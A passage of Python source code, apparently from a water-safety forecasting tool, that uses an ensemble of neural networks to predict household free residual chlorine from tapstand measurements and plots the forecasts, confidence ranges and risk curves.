delta = np.sum((rank_hist[0] - (test_len / ((self.network_count + 1)))) ** 2)
delta_0 = self.network_count * test_len / (self.network_count + 1)
self.delta_score_cal = delta / delta_0
CI_x = [0.10, 0.20, 0.30, 0.40, 0.50, 0.60, 0.70, 0.80, 0.90, 1.00]
fig = plt.figure(figsize=(15, 10), dpi=100)
gridspec.GridSpec(2, 3)
plt.subplot2grid((2, 3), (0, 0), colspan=2, rowspan=2)
plt.axhline(0.2, c="k", ls="--", label="Point-of-consumption FRC = 0.2 mg/L")
plt.scatter(
FRC_X, Y_true, edgecolors="k", facecolors="None", s=20, label="Observed"
)
plt.scatter(
FRC_X,
np.median(Y_pred, axis=0),
facecolors="r",
edgecolors="None",
s=10,
label="Forecast Median",
)
plt.vlines(
FRC_X,
np.min(Y_pred, axis=0),
np.max(Y_pred, axis=0),
color="r",
label="Forecast Range",
)
plt.xlabel("Point-of-Distribution FRC (mg/L)")
plt.ylabel("Point-of-Consumption FRC (mg/L)")
plt.subplot2grid((2, 3), (0, 2), colspan=1, rowspan=1)
plt.plot(CI_x, CI_x, c='k')
plt.scatter(CI_x, capture)
plt.scatter(CI_x, capture_20)
plt.xlabel("Ensemble Confidence Interval")
plt.ylabel("Percent Capture")
plt.ylim([0, 1])
plt.xlim([0, 1])
plt.subplot2grid((2, 3), (1, 2), colspan=1, rowspan=1)
plt.hist(rank, bins=(self.network_count + 1), density=True)
plt.xlabel('Rank')
plt.ylabel('Probability')
plt.savefig(directory + "\\Verification_Diagnostic_Figs.png", format='png')
plt.close()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format='png')
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def set_inputs_for_table(self, storage_target):
frc = np.arange(0.20, 2.05, 0.05)
lag_time = [storage_target for i in range(0, len(frc))]
am_collect = [0 for i in range(0, len(frc))]
pm_collect = [1 for i in range(0, len(frc))]
temp_med_am = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": am_collect,
}
temp_med_pm = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": pm_collect,
}
temp_95_am = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": am_collect,
}
temp_95_pm = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": pm_collect,
}
if WATTEMP in self.datainputs.columns:
watt_med = [self.median_wattemp for i in range(0, len(frc))]
watt_95 = [self.upper95_wattemp for i in range(0, len(frc))]
temp_med_am.update({"ts_wattemp": watt_med})
temp_med_pm.update({"ts_wattemp": watt_med})
temp_95_am.update({"ts_wattemp": watt_95})
temp_95_pm.update({"ts_wattemp": watt_95})
if COND in self.datainputs.columns:
cond_med = [self.median_cond for i in range(0, len(frc))]
cond_95 = [self.upper95_cond for i in range(0, len(frc))]
temp_med_am.update({"ts_cond": cond_med})
temp_med_pm.update({"ts_cond": cond_med})
temp_95_am.update({"ts_cond": cond_95})
temp_95_pm.update({"ts_cond": cond_95})
self.avg_case_predictors_am = pd.DataFrame(temp_med_am)
self.avg_case_predictors_pm = pd.DataFrame(temp_med_pm)
self.worst_case_predictors_am = pd.DataFrame(temp_95_am)
self.worst_case_predictors_pm = pd.DataFrame(temp_95_pm)
def post_process_predictions(self, results_table_frc):
# results_table_frc=results_table_frc.to_numpy()
evaluation_range = np.arange(-10, 10.001, 0.001)
test1_frc = np.arange(0.2, 2.05, 0.05)
bandwidth = self.WB_bandwidth
Max_CI = []
Min_CI = []
CI_99_Upper = []
CI_99_Lower = []
CI_95_Upper = []
CI_95_Lower = []
Median_Results = []
risk_00_kernel_frc = []
risk_20_kernel_frc = []
risk_25_kernel_frc = []
risk_30_kernel_frc = []
for a in range(0, len(test1_frc)):
scipy_kde = scipy.stats.gaussian_kde(results_table_frc[a, :], bw_method=bandwidth)
risk_00_kernel_frc = np.append(risk_00_kernel_frc, scipy_kde.integrate_box_1d(-10, 0))
risk_20_kernel_frc = np.append(risk_20_kernel_frc, scipy_kde.integrate_box_1d(-10, 0.2))
risk_25_kernel_frc = np.append(risk_25_kernel_frc, scipy_kde.integrate_box_1d(-10, 0.25))
risk_30_kernel_frc = np.append(risk_30_kernel_frc, scipy_kde.integrate_box_1d(-10, 0.3))
scipy_pdf = scipy_kde.evaluate(evaluation_range) * 0.001
scipy_cdf = np.cumsum(scipy_pdf)
Min_CI = np.append(Min_CI, evaluation_range[np.max(np.where(scipy_cdf == 0)[0])])
Max_CI = np.append(Max_CI, evaluation_range[np.argmax(scipy_cdf)])
CI_99_Upper = np.append(CI_99_Upper,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.995)))])
CI_99_Lower = np.append(CI_99_Lower,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.005)))])
CI_95_Upper = np.append(CI_95_Upper,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.975)))])
CI_95_Lower = np.append(CI_95_Lower,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.025)))])
Median_Results = np.append(Median_Results,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.5)))])
temp_key = {"Tapstand FRC":np.arange(0.20,2.05,0.05),"median": Median_Results, "Ensemble Minimum": Min_CI, "Ensemble Maximum": Max_CI,
"Lower 99 CI": CI_99_Lower, "Upper 99 CI": CI_99_Upper, "Lower 95 CI": CI_95_Lower,
"Upper 95 CI": CI_95_Upper, 'probability==0': risk_00_kernel_frc,
"probability<=0.20": risk_20_kernel_frc, "probability<=0.25": risk_25_kernel_frc,
"probability<=0.30": risk_30_kernel_frc}
post_processed_df = pd.DataFrame(temp_key)
return post_processed_df
def predict(self):
"""
To make the predictions, a pretrained model must be loaded using the import_pretrained_model() method.
The SWOT ANN uses an ensemble of 200 ANNs. All of the 200 ANNs make a prediction on the inputs and the results are
stored. The median of all the 200 predictions is calculated and stored here.
The method also calculates the probabilities of the target FRC levels to be less than 0.2, 0.25 and 0.3 mg/L respectively.
The predictions are target FRC values in mg/L, and the probability values range from 0 to 1.
All of the above results are saved in the self.results class field.
V2.0 Notes: If at least 1 WQ variable is provided, we do a scenario analysis, providing targets for the average case
(median water quality) and the "worst case" using the upper 95th percentile water quality
"""
# Initialize empty arrays for the probabilities to be appended in.
avg_case_results_am = {}
avg_case_results_pm = {}
worst_case_results_am = {}
worst_case_results_pm = {}
# Normalize the inputs using the input scaler loaded
input_scaler = self.predictors_scaler
avg_case_inputs_norm_am = input_scaler.transform(self.avg_case_predictors_am)
avg_case_inputs_norm_pm = input_scaler.transform(self.avg_case_predictors_pm)
worst_case_inputs_norm_am = input_scaler.transform(self.worst_case_predictors_am)
worst_case_inputs_norm_pm = input_scaler.transform(self.worst_case_predictors_pm)
##AVERAGE CASE TARGET w AM COLLECTION
# Iterate through all loaded pretrained networks, make predictions based on the inputs,
# calculate the median of the predictions and store everything to self.results
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(avg_case_inputs_norm_am)).tolist()
temp = sum(predictions, [])
avg_case_results_am.update({key: temp})
self.avg_case_results_am = pd.DataFrame(avg_case_results_am)
self.avg_case_results_am["median"] = self.avg_case_results_am.median(axis=1)
for i in self.avg_case_predictors_am.keys():
self.avg_case_results_am.update({i: self.avg_case_predictors_am[i].tolist()})
self.avg_case_results_am[i] = self.avg_case_predictors_am[i].tolist()
# Include the inputs/predictors in the self.results variable
for i in self.avg_case_predictors_am.keys():
self.avg_case_results_am.update({i: self.avg_case_predictors_am[i].tolist()})
self.avg_case_results_am[i] = self.avg_case_predictors_am[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.avg_case_results_am["probability<=0.20"] = np.sum(
np.less_equal(self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)], 0.2),
axis=1) / self.network_count
self.avg_case_results_am["probability<=0.25"] = np.sum(
np.less_equal(self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)], 0.25),
axis=1) / self.network_count
self.avg_case_results_am["probability<=0.30"] = np.sum(
np.less_equal(self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)], 0.3),
axis=1) / self.network_count
else:
self.avg_case_results_am_post = self.post_process_predictions(
self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)].to_numpy())
##AVERAGE CASE TARGET w PM COLLECTION
# Iterate through all loaded pretrained networks, make predictions based on the inputs,
# calculate the median of the predictions and store everything to self.results
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(avg_case_inputs_norm_pm)).tolist()
temp = sum(predictions, [])
avg_case_results_pm.update({key: temp})
self.avg_case_results_pm = pd.DataFrame(avg_case_results_pm)
self.avg_case_results_pm["median"] = self.avg_case_results_pm.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.avg_case_predictors_pm.keys():
self.avg_case_results_pm.update({i: self.avg_case_predictors_pm[i].tolist()})
self.avg_case_results_pm[i] = self.avg_case_predictors_pm[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.avg_case_results_pm["probability<=0.20"] = (
np.sum(
np.less(
self.avg_case_results_pm.iloc[:, 0 : (self.network_count - 1)],
0.2,
),
axis=1,
)
/ self.network_count
)
self.avg_case_results_pm["probability<=0.25"] = (
np.sum(
np.less(
self.avg_case_results_pm.iloc[:, 0 : (self.network_count - 1)],
0.25,
),
axis=1,
)
/ self.network_count
)
self.avg_case_results_pm["probability<=0.30"] = (
np.sum(
np.less(
self.avg_case_results_pm.iloc[:, 0 : (self.network_count - 1)],
0.3,
),
axis=1,
)
/ self.network_count
)
else:
self.avg_case_results_pm_post = self.post_process_predictions(
self.avg_case_results_pm.iloc[:, 0:(self.network_count - 1)].to_numpy())
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
##WORST CASE TARGET w AM COLLECTION
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(worst_case_inputs_norm_am)).tolist()
temp = sum(predictions, [])
worst_case_results_am.update({key: temp})
self.worst_case_results_am = pd.DataFrame(worst_case_results_am)
self.worst_case_results_am["median"] = self.worst_case_results_am.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.worst_case_predictors_am.keys():
self.worst_case_results_am.update({i: self.worst_case_predictors_am[i].tolist()})
self.worst_case_results_am[i] = self.worst_case_predictors_am[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.worst_case_results_am["probability<=0.20"] = (
np.sum(
np.less(
self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
],
0.2,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_am["probability<=0.25"] = (
np.sum(
np.less(
self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
],
0.25,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_am["probability<=0.30"] = (
np.sum(
np.less(
self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
],
0.3,
),
axis=1,
)
/ self.network_count
)
else:
self.worst_case_results_am_post = self.post_process_predictions(
self.worst_case_results_am.iloc[:, 0:(self.network_count - 1)].to_numpy())
##WORST CASE TARGET w PM COLLECTION
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(worst_case_inputs_norm_pm)).tolist()
temp = sum(predictions, [])
worst_case_results_pm.update({key: temp})
self.worst_case_results_pm = pd.DataFrame(worst_case_results_pm)
self.worst_case_results_pm["median"] = self.worst_case_results_pm.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.worst_case_predictors_pm.keys():
self.worst_case_results_pm.update({i: self.worst_case_predictors_pm[i].tolist()})
self.worst_case_results_pm[i] = self.worst_case_predictors_pm[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.worst_case_results_pm["probability<=0.20"] = (
np.sum(
np.less(
self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
],
0.2,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_pm["probability<=0.25"] = (
np.sum(
np.less(
self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
],
0.25,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_pm["probability<=0.30"] = (
np.sum(
np.less(
self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
],
0.3,
),
axis=1,
)
/ self.network_count
)
else:
self.worst_case_results_pm_post = self.post_process_predictions(
self.worst_case_results_pm.iloc[:, 0:(self.network_count - 1)].to_numpy())
def results_visualization(self, filename, storage_target):
test1_frc = np.arange(0.2, 2.05, 0.05)
# Variables to plot - Full range, 95th percentile, 99th percentile, median, the three risks
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
if self.post_process_check == False:
results_table_frc_avg_am = self.avg_case_results_am.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_avg_pm = self.avg_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_worst_am = self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_worst_pm = self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
]
preds_fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(
2, 2, figsize=(6.69, 6.69), dpi=300
)
ax1.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_am, 97.5, axis=1),
np.percentile(results_table_frc_avg_am, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
np.min(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
np.max(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
np.median(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("Average Case - AM Collection")
ax2.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_pm, 97.5, axis=1),
np.percentile(results_table_frc_avg_pm, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
np.min(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
np.max(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
np.median(results_table_frc_avg_pm, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("Average Case - PM Collection")
ax3.fill_between(
test1_frc,
np.percentile(results_table_frc_worst_am, 97.5, axis=1),
np.percentile(results_table_frc_worst_am, 2.5, axis=1),
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax3.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax3.plot(
test1_frc,
np.min(results_table_frc_worst_am, axis=1),
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax3.plot(
test1_frc,
np.max(results_table_frc_worst_am, axis=1),
"#b80000",
linewidth=0.5,
)
ax3.plot(
test1_frc,
np.median(results_table_frc_worst_am, axis=1),
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax3.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax3.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax3.set_xlim([0.19, 2.0])
ax3.set_xticks(np.arange(0.2, 2.2, 0.2))
ax3.set_xlabel("Tap Stand FRC (mg/L)")
ax3.set_ylabel("Household FRC (mg/L)")
ax3.set_title("Worst Case - AM Collection")
ax4.fill_between(
test1_frc,
np.percentile(results_table_frc_worst_pm, 97.5, axis=1),
np.percentile(results_table_frc_worst_pm, 2.5, axis=1),
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax4.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax4.plot(
test1_frc,
np.min(results_table_frc_worst_pm, axis=1),
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax4.plot(
test1_frc,
np.max(results_table_frc_worst_pm, axis=1),
"#b80000",
linewidth=0.5,
)
ax4.plot(
test1_frc,
np.median(results_table_frc_worst_pm, axis=1),
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax4.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax4.set_xlim([0.19, 2.0])
ax4.set_xticks(np.arange(0.2, 2.2, 0.2))
ax4.set_xlabel("Tap Stand FRC (mg/L)")
ax4.set_ylabel("Household FRC (mg/L)")
ax4.set_title("Worst Case - PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_am, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_avg_pm, 0.20), axis=1)
/ self.network_count,
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_worst_am, 0.2), axis=1)
/ self.network_count,
c="#b80000",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, AM Collection",
)
plt.plot(
test1_frc,
np.sum(np.less(results_table_frc_worst_pm, 0.2), axis=1)
/ self.network_count,
c="#b80000",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.subplots_adjust(bottom=0.15, right=0.95)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
plt.close()
elif self.post_process_check == True:
preds_fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(
2, 2, figsize=(6.69, 6.69), dpi=300
)
ax1.fill_between(
test1_frc,
self.avg_case_results_am_post["Upper 95 CI"],
self.avg_case_results_am_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
self.avg_case_results_am_post["median"],
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("Average Case - AM Collection")
ax2.fill_between(
test1_frc,
self.avg_case_results_pm_post["Upper 95 CI"],
self.avg_case_results_pm_post["Lower 95 CI"],
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Minimum"],
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["Ensemble Maximum"],
"#ffa600",
linewidth=0.5,
)
ax2.plot(
test1_frc,
self.avg_case_results_pm_post["median"],
"#ffa600",
linewidth=1,
label="median Prediction",
)
ax2.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax2.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax2.set_xlim([0.19, 2.0])
ax2.set_xticks(np.arange(0.2, 2.2, 0.2))
ax2.set_xlabel("Tap Stand FRC (mg/L)")
ax2.set_ylabel("Household FRC (mg/L)")
ax2.set_title("Average Case - PM Collection")
ax3.fill_between(
test1_frc,
self.worst_case_results_am_post["Upper 95 CI"],
self.worst_case_results_am_post["Lower 95 CI"],
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax3.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax3.plot(
test1_frc,
self.worst_case_results_am_post["Ensemble Minimum"],
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax3.plot(
test1_frc,
self.worst_case_results_am_post["Ensemble Maximum"],
"#b80000",
linewidth=0.5,
)
ax3.plot(
test1_frc,
self.worst_case_results_am_post["median"],
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax3.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax3.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax3.set_xlim([0.19, 2.0])
ax3.set_xticks(np.arange(0.2, 2.2, 0.2))
ax3.set_xlabel("Tap Stand FRC (mg/L)")
ax3.set_ylabel("Household FRC (mg/L)")
ax3.set_title("Worst Case - AM Collection")
ax4.fill_between(
test1_frc,
self.worst_case_results_pm_post["Upper 95 CI"],
self.worst_case_results_pm_post["Lower 95 CI"],
facecolor="#b80000",
alpha=0.5,
label="95th Percentile Range",
)
ax4.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax4.plot(
test1_frc,
self.worst_case_results_pm_post["Ensemble Minimum"],
"#b80000",
linewidth=0.5,
label="Minimum/Maximum",
)
ax4.plot(
test1_frc,
self.worst_case_results_pm_post["Ensemble Maximum"],
"#b80000",
linewidth=0.5,
)
ax4.plot(
test1_frc,
self.worst_case_results_pm_post["median"],
"#b80000",
linewidth=1,
label="Median Prediction",
)
ax4.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax4.set_xlim([0.19, 2.0])
ax4.set_xticks(np.arange(0.2, 2.2, 0.2))
ax4.set_xlabel("Tap Stand FRC (mg/L)")
ax4.set_ylabel("Household FRC (mg/L)")
ax4.set_title("Worst Case - PM Collection")
plt.subplots_adjust(wspace=0.25)
plt.savefig(
os.path.splitext(filename)[0] + "_Predictions_Fig.png",
format="png",
bbox_inches="tight",
)
StringIOBytes_preds = io.BytesIO()
plt.savefig(StringIOBytes_preds, format="png", bbox_inches="tight")
StringIOBytes_preds.seek(0)
preds_base_64_pngData = base64.b64encode(StringIOBytes_preds.read())
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig1.pickle', 'wb'))
plt.close()
risk_fig = plt.figure(figsize=(6.69, 3.35), dpi=300)
plt.plot(
test1_frc,
self.avg_case_results_am_post["probability<=0.20"],
c="#ffa600",
label="Risk of Household FRC < 0.20 mg/L - Average Case, AM Collection",
)
plt.plot(
test1_frc,
self.avg_case_results_pm_post["probability<=0.20"],
c="#ffa600",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Average Case, PM Collection",
)
plt.plot(
test1_frc,
self.worst_case_results_am_post["probability<=0.20"],
c="#b80000",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, AM Collection",
)
plt.plot(
test1_frc,
self.worst_case_results_pm_post["probability<=0.20"],
c="#b80000",
ls="--",
label="Risk of Household FRC < 0.20 mg/L - Worst Case, PM Collection",
)
plt.xlim([0.2, 2])
plt.xlabel("Tapstand FRC (mg/L)")
plt.ylim([0, 1])
plt.ylabel("Risk of Point-of-Consumption FRC < 0.2 mg/L")
plt.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
plt.savefig(
os.path.splitext(filename)[0] + "_Risk_Fig.png",
format="png",
bbox_inches="tight",
)
StringIOBytes_risk = io.BytesIO()
plt.savefig(StringIOBytes_risk, format="png", bbox_inches="tight")
StringIOBytes_risk.seek(0)
risk_base_64_pngData = base64.b64encode(StringIOBytes_risk.read())
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig2.pickle', 'wb'))
plt.close()
if WATTEMP in self.datainputs.columns and COND in self.datainputs.columns:
hist_fig, (ax1, ax2, ax3, ax4, ax5, ax6) = plt.subplots(
6, 1, figsize=(3.35, 6.69), dpi=300
)
ax1.set_ylabel("Frequency")
ax1.set_xlabel("Tapstand FRC (mg/L)")
ax1.hist(self.datainputs.iloc[:, 0], bins=30, color="grey")
ax2.set_ylabel("Frequency")
ax2.set_xlabel("Elapsed Time (hours)")
ax2.hist(self.datainputs.iloc[:, 1], bins=30, color="grey")
ax3.set_ylabel("Frequency")
ax3.set_xlabel("Collection Time (0=AM, 1=PM)")
ax3.hist(self.datainputs.iloc[:, 2], bins=30, color="grey")
ax4.set_ylabel("Frequency")
ax4.set_xlabel("Water Temperature(" + r"$\degree$" + "C)")
ax4.hist(self.datainputs.iloc[:, 3], bins=30, color="grey")
ax4.axvline(
self.median_wattemp,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax4.axvline(
self.upper95_wattemp,
c="#b80000",
ls="--",
label="Worst Case Value Used",
)
ax4.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax5.set_ylabel("Frequency")
ax5.set_xlabel("Electrical Conductivity (" + r"$\mu$" + "s/cm)")
ax5.hist(self.datainputs.iloc[:, 4], bins=30, color="grey")
ax5.axvline(
self.median_cond,
c="#ffa600",
ls="--",
label="Average Case Value Used",
)
ax5.axvline(
self.upper95_cond,
c="#b80000",
ls="--",
label="Worst Case Value used",
)
ax5.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
ncol=1,
labelspacing=0.1,
columnspacing=0.2,
handletextpad=0.1,
loc="upper right",
)
ax6.set_ylabel("Frequency")
ax6.set_xlabel("Household FRC (mg/L)")
ax6.hist(self.dataoutputs, bins=30, color="grey")
plt.subplots_adjust(
left=0.18, hspace=0.60, top=0.99, bottom=0.075, right=0.98
)
plt.savefig(
os.path.splitext(filename)[0] + "_Histograms_Fig.png",
format="png",
bbox_inches="tight",
)
# pl.dump(fig, open(os.path.splitext(filename)[0] + 'Fig3.pickle', 'wb'))
plt.close()
StringIOBytes_histogram = io.BytesIO()
plt.savefig(StringIOBytes_histogram, format="png", bbox_inches="tight")
StringIOBytes_histogram.seek(0)
hist_base_64_pngData = base64.b64encode(StringIOBytes_histogram.read())
